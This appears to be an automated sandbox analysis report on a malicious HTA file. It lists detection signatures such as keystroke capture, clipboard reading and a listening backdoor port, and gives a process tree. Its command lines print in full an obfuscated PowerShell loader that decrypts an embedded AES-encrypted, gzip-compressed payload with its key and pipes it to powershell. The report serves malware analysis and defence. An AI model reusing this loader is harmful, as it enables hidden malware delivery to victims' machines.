Edit tour
Windows
Analysis Report
a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta
Overview
General Information
Detection
Score: | 92 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Very long command line found
Suspicious powershell command line found
Contains functionality to modify clipboard data
Suspicious command line found
Powershell drops PE file
Drops PE files to the user root directory
Found suspicious powershell code related to unpacking or dynamic code loading
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Uses the system / local time for branch decision (may execute only at specific dates)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to retrieve information about pressed keystrokes
Checks for available system drives (often done to infect USB drives)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Classification
- System is w10x64
- mshta.exe (PID: 2832 cmdline:
mshta.exe "C:\Users\ user\Deskt op\a913b6f 2499bfbef3 18b948a278 f0e441a5d6 334752712d 4f4539e72. hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 4564 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy UnR estricted Start-Proc ess 'cmd.e xe' -Windo wStyle hid den -Argum entList {/ c powershe ll.exe $fN aPOP = 'AA AAAAAAAAAA AAAAAAAAAP q3+YYuESDC P30fCtt1g8 +BllQDeEK2 RL0/q2v+83 d4BFFpsS5i JU6kFeS1Jz aAIIjoFB3q bZ4arUa/P0 A2xkjM5iuN W72eqrksKC nteMTJHARv OlHxtFF2Y5 wz5P2jTj8q OAbDNBfSmo ktklgidKmI Tv4Lcg8mIL UKzUd9s+wK jzqzjTCjO/ 2G5KR/8OAC yCs/NGTKY8 euJIFd3JJz 5ylYW3oFjp f3MJ9CzN20 cb8PHYfovW 8CHT0xnVzC fmgO/E8zd5 ZqzfWG7smp cDA2ExuZDG AJGu5tHHWB 7zEHt3D3pi B67d6q7vHJ NkGbSIV6zC POFIP7s25z 6l2WgczC+2 l0H4WG5atf mshceYxBLk JmL3+4vdT9 rw3zEp3Gp2 C/Hy8udbeI D77xXgK3+Q rDNhAlxW7k xAFq6B8jYi FfP3403hxt qvgrEaHvVf 8Yj2RvMsbD jplrnScmvG d9IqA7Oxvu bNuWW9u2M2 3JiSeSQ4uZ 7NhkFBozi8 YuXfaIrOon GW7TY7XUD6 uPRXjTiAwN NNS2sAQk/o KX7moMS6bG Vr3YYH/SG2 sq5Kq7RYEJ Pk4BTIkllK dMILZqNu8d /Xf1CeZAop nM27zbagY2 uYzvLziepN imUT6TKFec r+KQcrmydb FCsk/3RbYP dZNEoDmRrJ ZuEJPSkcyj 60Ix9eVqYb KTMtPkyyT4 yGrR/6uU6i +3tYlLQXZj JHNnGBzyXV XwMnYs9nzN dpphf2bMYe LnENNqsNg8 rs0j4jTd9O zOJo6orWXF Y54hD1OMI8 Rzby565/gr QubRf9KNj3 pkkKx5LO7J jjkdA49ARW /YGaIvigRg vZKfqOLkwI Nuh3agYb/7 frzuyKeLCz mwXHR7gPJm xmpop3ScsH lT6P522CVJ acLhmbxH8E bVj89KLiG5 DnG0o1y0kV 3zJ8QKXZcm fiHT+wA0P7 c89p9Ihf41 CM6quS0cjz qXJH76OPrm 8iujlCD9Sm MxUkrE8SoP lRjE+s8rbd Tv';$mehLa ZDc = 'd2Z 5WFdPd1VKS XdqYXNCRnh TRWRuSFBtZ GJqWlFTSXo =';$PYLEHH T = New-Ob ject 'Syst em.Securit y.Cryptogr aphy.AesMa naged';$PY LEHHT.Mode = [System .Security. Cryptograp hy.CipherM ode]::ECB; $PYLEHHT.P adding = [ System.Sec urity.Cryp tography.P addingMode ]::Zeros;$ PYLEHHT.Bl ockSize = 128;$PYLEH HT.KeySize = 256;$PY LEHHT.Key = [System. Convert]:: FromBase64 String($me hLaZDc);$B WoPS = [Sy stem.Conve rt]::FromB ase64Strin g($fNaPOP) ;$MkdtxWXs = $BWoPS[ 0..15];$PY LEHHT.IV = $MkdtxWXs ;$IaLmFBNd k = $PYLEH HT.CreateD ecryptor() ;$MvUYGVuH e = $IaLmF BNdk.Trans formFinalB lock($BWoP S, 16, $BW oPS.Length - 16);$PY LEHHT.Disp ose();$cxV QsOlZ = Ne w-Object S ystem.IO.M emoryStrea m( , $MvUY GVuHe );$k PnxbBu = N ew-Object System.IO. MemoryStre am;$uGBpSh IzT = New- Object Sys tem.IO.Com pression.G zipStream $cxVQsOlZ, ([IO.Comp ression.Co mpressionM ode]::Deco mpress);$u GBpShIzT.C opyTo( $kP nxbBu );$u GBpShIzT.C lose();$cx VQsOlZ.Clo se();[byte []] $bsMmu = $kPnxbB u.ToArray( );$FPimSbR = [System .Text.Enco ding]::UTF 8.GetStrin g($bsMmu); $FPimSbR | powershel l - } MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 6088 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4208 cmdline:
"C:\Window s\system32 \cmd.exe" /c powersh ell.exe $f NaPOP = 'A AAAAAAAAAA AAAAAAAAAA Pq3+YYuESD CP30fCtt1g 8+BllQDeEK 2RL0/q2v+8 3d4BFFpsS5 iJU6kFeS1J zaAIIjoFB3 qbZ4arUa/P 0A2xkjM5iu NW72eqrksK CnteMTJHAR vOlHxtFF2Y 5wz5P2jTj8 qOAbDNBfSm oktklgidKm ITv4Lcg8mI LUKzUd9s+w KjzqzjTCjO /2G5KR/8OA CyCs/NGTKY 8euJIFd3JJ z5ylYW3oFj pf3MJ9CzN2 0cb8PHYfov W8CHT0xnVz CfmgO/E8zd 5ZqzfWG7sm pcDA2ExuZD GAJGu5tHHW B7zEHt3D3p iB67d6q7vH JNkGbSIV6z CPOFIP7s25 z6l2WgczC+ 2l0H4WG5at fmshceYxBL kJmL3+4vdT 9rw3zEp3Gp 2C/Hy8udbe ID77xXgK3+ QrDNhAlxW7 kxAFq6B8jY iFfP3403hx tqvgrEaHvV f8Yj2RvMsb DjplrnScmv Gd9IqA7Oxv ubNuWW9u2M 23JiSeSQ4u Z7NhkFBozi 8YuXfaIrOo nGW7TY7XUD 6uPRXjTiAw NNNS2sAQk/ oKX7moMS6b GVr3YYH/SG 2sq5Kq7RYE JPk4BTIkll KdMILZqNu8 d/Xf1CeZAo pnM27zbagY 2uYzvLziep NimUT6TKFe cr+KQcrmyd bFCsk/3RbY PdZNEoDmRr JZuEJPSkcy j60Ix9eVqY bKTMtPkyyT 4yGrR/6uU6 i+3tYlLQXZ jJHNnGBzyX VXwMnYs9nz Ndpphf2bMY eLnENNqsNg 8rs0j4jTd9 OzOJo6orWX FY54hD1OMI 8Rzby565/g rQubRf9KNj 3pkkKx5LO7 JjjkdA49AR W/YGaIvigR gvZKfqOLkw INuh3agYb/ 7frzuyKeLC zmwXHR7gPJ mxmpop3Scs HlT6P522CV JacLhmbxH8 EbVj89KLiG 5DnG0o1y0k V3zJ8QKXZc mfiHT+wA0P 7c89p9Ihf4 1CM6quS0cj zqXJH76OPr m8iujlCD9S mMxUkrE8So PlRjE+s8rb dTv';$mehL aZDc = 'd2 Z5WFdPd1VK SXdqYXNCRn hTRWRuSFBt ZGJqWlFTSX o=';$PYLEH HT = New-O bject 'Sys tem.Securi ty.Cryptog raphy.AesM anaged';$P YLEHHT.Mod e = [Syste m.Security .Cryptogra phy.Cipher Mode]::ECB ;$PYLEHHT. Padding = [System.Se curity.Cry ptography. PaddingMod e]::Zeros; $PYLEHHT.B lockSize = 128;$PYLE HHT.KeySiz e = 256;$P YLEHHT.Key = [System .Convert]: :FromBase6 4String($m ehLaZDc);$ BWoPS = [S ystem.Conv ert]::From Base64Stri ng($fNaPOP );$MkdtxWX s = $BWoPS [0..15];$P YLEHHT.IV = $MkdtxWX s;$IaLmFBN dk = $PYLE HHT.Create Decryptor( );$MvUYGVu He = $IaLm FBNdk.Tran sformFinal Block($BWo PS, 16, $B WoPS.Lengt h - 16);$P YLEHHT.Dis pose();$cx VQsOlZ = N ew-Object System.IO. MemoryStre am( , $MvU YGVuHe );$ kPnxbBu = New-Object System.IO .MemoryStr eam;$uGBpS hIzT = New -Object Sy stem.IO.Co mpression. GzipStream $cxVQsOlZ , ([IO.Com pression.C ompression Mode]::Dec ompress);$ uGBpShIzT. CopyTo( $k PnxbBu );$ uGBpShIzT. Close();$c xVQsOlZ.Cl ose();[byt e[]] $bsMm u = $kPnxb Bu.ToArray ();$FPimSb R = [Syste m.Text.Enc oding]::UT F8.GetStri ng($bsMmu) ;$FPimSbR | powershe ll - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5928 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5292 cmdline:
powershell .exe $fNaP OP = 'AAAA AAAAAAAAAA AAAAAAAPq3 +YYuESDCP3 0fCtt1g8+B llQDeEK2RL 0/q2v+83d4 BFFpsS5iJU 6kFeS1JzaA IIjoFB3qbZ 4arUa/P0A2 xkjM5iuNW7 2eqrksKCnt eMTJHARvOl HxtFF2Y5wz 5P2jTj8qOA bDNBfSmokt klgidKmITv 4Lcg8mILUK zUd9s+wKjz qzjTCjO/2G 5KR/8OACyC s/NGTKY8eu JIFd3JJz5y lYW3oFjpf3 MJ9CzN20cb 8PHYfovW8C HT0xnVzCfm gO/E8zd5Zq zfWG7smpcD A2ExuZDGAJ Gu5tHHWB7z EHt3D3piB6 7d6q7vHJNk GbSIV6zCPO FIP7s25z6l 2WgczC+2l0 H4WG5atfms hceYxBLkJm L3+4vdT9rw 3zEp3Gp2C/ Hy8udbeID7 7xXgK3+QrD NhAlxW7kxA Fq6B8jYiFf P3403hxtqv grEaHvVf8Y j2RvMsbDjp lrnScmvGd9 IqA7OxvubN uWW9u2M23J iSeSQ4uZ7N hkFBozi8Yu XfaIrOonGW 7TY7XUD6uP RXjTiAwNNN S2sAQk/oKX 7moMS6bGVr 3YYH/SG2sq 5Kq7RYEJPk 4BTIkllKdM ILZqNu8d/X f1CeZAopnM 27zbagY2uY zvLziepNim UT6TKFecr+ KQcrmydbFC sk/3RbYPdZ NEoDmRrJZu EJPSkcyj60 Ix9eVqYbKT MtPkyyT4yG rR/6uU6i+3 tYlLQXZjJH NnGBzyXVXw MnYs9nzNdp phf2bMYeLn ENNqsNg8rs 0j4jTd9OzO Jo6orWXFY5 4hD1OMI8Rz by565/grQu bRf9KNj3pk kKx5LO7Jjj kdA49ARW/Y GaIvigRgvZ KfqOLkwINu h3agYb/7fr zuyKeLCzmw XHR7gPJmxm pop3ScsHlT 6P522CVJac LhmbxH8EbV j89KLiG5Dn G0o1y0kV3z J8QKXZcmfi HT+wA0P7c8 9p9Ihf41CM 6quS0cjzqX JH76OPrm8i ujlCD9SmMx UkrE8SoPlR jE+s8rbdTv ';$mehLaZD c = 'd2Z5W FdPd1VKSXd qYXNCRnhTR WRuSFBtZGJ qWlFTSXo=' ;$PYLEHHT = New-Obje ct 'System .Security. Cryptograp hy.AesMana ged';$PYLE HHT.Mode = [System.S ecurity.Cr yptography .CipherMod e]::ECB;$P YLEHHT.Pad ding = [Sy stem.Secur ity.Crypto graphy.Pad dingMode]: :Zeros;$PY LEHHT.Bloc kSize = 12 8;$PYLEHHT .KeySize = 256;$PYLE HHT.Key = [System.Co nvert]::Fr omBase64St ring($mehL aZDc);$BWo PS = [Syst em.Convert ]::FromBas e64String( $fNaPOP);$ MkdtxWXs = $BWoPS[0. .15];$PYLE HHT.IV = $ MkdtxWXs;$ IaLmFBNdk = $PYLEHHT .CreateDec ryptor();$ MvUYGVuHe = $IaLmFBN dk.Transfo rmFinalBlo ck($BWoPS, 16, $BWoP S.Length - 16);$PYLE HHT.Dispos e();$cxVQs OlZ = New- Object Sys tem.IO.Mem oryStream( , $MvUYGV uHe );$kPn xbBu = New -Object Sy stem.IO.Me moryStream ;$uGBpShIz T = New-Ob ject Syste m.IO.Compr ession.Gzi pStream $c xVQsOlZ, ( [IO.Compre ssion.Comp ressionMod e]::Decomp ress);$uGB pShIzT.Cop yTo( $kPnx bBu );$uGB pShIzT.Clo se();$cxVQ sOlZ.Close ();[byte[] ] $bsMmu = $kPnxbBu. ToArray(); $FPimSbR = [System.T ext.Encodi ng]::UTF8. GetString( $bsMmu);$F PimSbR MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - powershell.exe (PID: 5224 cmdline:
powershell - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - Acrobat.exe (PID: 1840 cmdline:
C:\Program Files\Ado be\Acrobat DC\Acroba t\Acrobat. exe" "C:\U sers\user\ Research.p df MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 3324 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 5196 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 28 --field -trial-han dle=1564,i ,795981964 8417443592 ,399757761 6809760479 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - putty.exe (PID: 7236 cmdline:
"C:\Users\ user\putty .exe" MD5: 7A0DFC5353FF6DE7DE0208A29FA2FFC9)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
⊘No Sigma rule has matched
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | URL Reputation: | ||
Source: | URL Reputation: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Code function: | 10_2_004486F8 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | IP Address: |
Source: | HTTP traffic detected: |